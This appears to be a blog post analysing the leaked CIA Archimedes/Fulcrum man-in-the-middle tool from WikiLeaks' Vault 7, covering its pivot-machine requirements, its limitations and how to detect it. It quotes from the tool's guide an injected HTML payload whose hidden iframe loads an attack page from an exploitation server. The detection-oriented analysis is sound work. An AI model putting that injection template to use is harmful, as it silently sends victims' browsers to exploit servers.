Today's WikiLeaks release, titled Archimedes, features malware tools designed for man-in-the-middle attacks. Archimedes, a product of CIA's infamous UMBRAGE group and the completed version of Fulcrum, can be installed onto a machine inside of a Local Area Network (LAN) and used to carry out attacks on other devices in the same network. This is described in Archimedes and Fulcrum documentation as the "pivot machine".

Once the pivot machine has successfully configured, it can be used to redirect Internet traffic coming from the target machine(s):

Archimedes is used to re-direct LAN traffic from a target’s computer through an attacker controlled computer before it is passed to the gateway. This enables the tool to inject a forged web server response that will redirect the target’s web browser to an arbitrary location. This technique is typically used to redirect the target to an exploitation server while providing the appearance of a normal browsing session.

Source: Archimedes 1.0 User Guide

This post will discuss how Archimedes exactly works, its limitations and how it might be detected.

The leak itself and documents for Archimedes can be found on WikiLeaks.

Other parts to this series include:

• Part I: The CIA and NyanCat: The hackers and tools of Vault 7's "Year Zero"
• Part II: "Dark Matter" - All your Macintosh are belong to CIA
• Part III: Marble Framework - The CIA's cloaking device for hackers
• Part IV: Grasshopper and more research challenges!
• Part V: HIVE, Longhorn and the CIA's reign of cyberterror
• Part VI: Weeping Angel is listening...
• Part VII: Watch out for Scribbles!

Methods of operation

Archimedes is most highly dependent on the pivot machine for execution. For instance, as of Fulcrum v0.6 the pivot machine must be running Windows XP, Vista or 7 and the pivot and target machines must be on the same network. The network itself must also be IPv4 and ethernet. Fulcrum v0.6 did include support for multiple languages, however.(1)

Once configured and running on the pivot machine Archimedes and Fulcrum become far more dangerous and subtle. The pivot machine will perform a man-in-the-middle style attack to monitor and log HTTP requests from the target machine(s) and even re-direct those requests to desired IPs and domains allowing for further exploitation.

Archimedes can be configured with multiple duration options for its software monitoring and injection. The most common use-case, however, seems to have Archimedes automatically shut down after the target is re-directed to the desired URL once.(2) This maximizes stealth.

What makes Archimedes so dangerous is the fact that the target machine can be just about any make, model and operating system so long as it is sending HTTP requests from within the same ethernet network as the pivot machine. As long as the pivot machine remains under an agent's control they are able to exploit any and all HTTP traffic.

Just imagine if some nefarious individual had the ability to log and re-direct your HTTP requests to any site without you being the wiser? This is Archimedes.

Limitations and means of detection

Fulcrum binaries were tested against a range of personal security products (PSPs) like Kaspersky, AVG and Symantec but the results are either redacted or simply not recorded.(3)

As of Fulcrum v0.6 software on the pivot machine does not persist (or remain active after reboot), however, so simply rebooting all machines on the network would temporarily prevent any such intrusions or surveillance.(4) This, however, does not stop an agent from planting a dedicated pivot machine inside the network. It is also unsure if Fulcrum's switch to Archimedes brought enhanced functionalities in this regard.

While the attack is taking place Archimedes and Fulcrum can also be detected by viewing the source code for a current website. HTML, notably a hidden iFrame, is injected into the page which forces the target to redirect and can also be seen by the target:


<html>
<head>
<title>
<style type="text/css">
html, body
{
overflow: hidden;
margin: auto;
height: 100%;
width: 100%;
}
</style>
</head>
<body>
< iframe src="http://10.0.0.11/attack.html" frameborder="0" width="0" height="0">
< iframe src="http://10.0.0.11/?" frameborder="0" width="100%" height="100%">
</body>
</html>


The attack URL will be replaced with that specified by the user and the second URL will redirect the client to the original target. The result is a web page that looks like the original target.

Source: Archimedes 1.0 User Guide

As a side effect of being a man-in-the-middle attack Archimedes and Fulcrum also slightly increase the latency (network delay or lag) for the target's HTTP requests.(5) Consistent and well-monitored networks and devices could alert trained observers and network admins, hence why it is recommended to be used sparingly and over short periods.

Fulcrum documentation also gives this rather peculiar warning on its proper usage, which apparently does not include "corporate or enterprise networks":

Don't use Fulcrum on networks which are likely to have IDS and/or network monitoring in place (e.g. corporate or enterprise networks.).

Source: Fulcrum Mission Manager Brief v0.6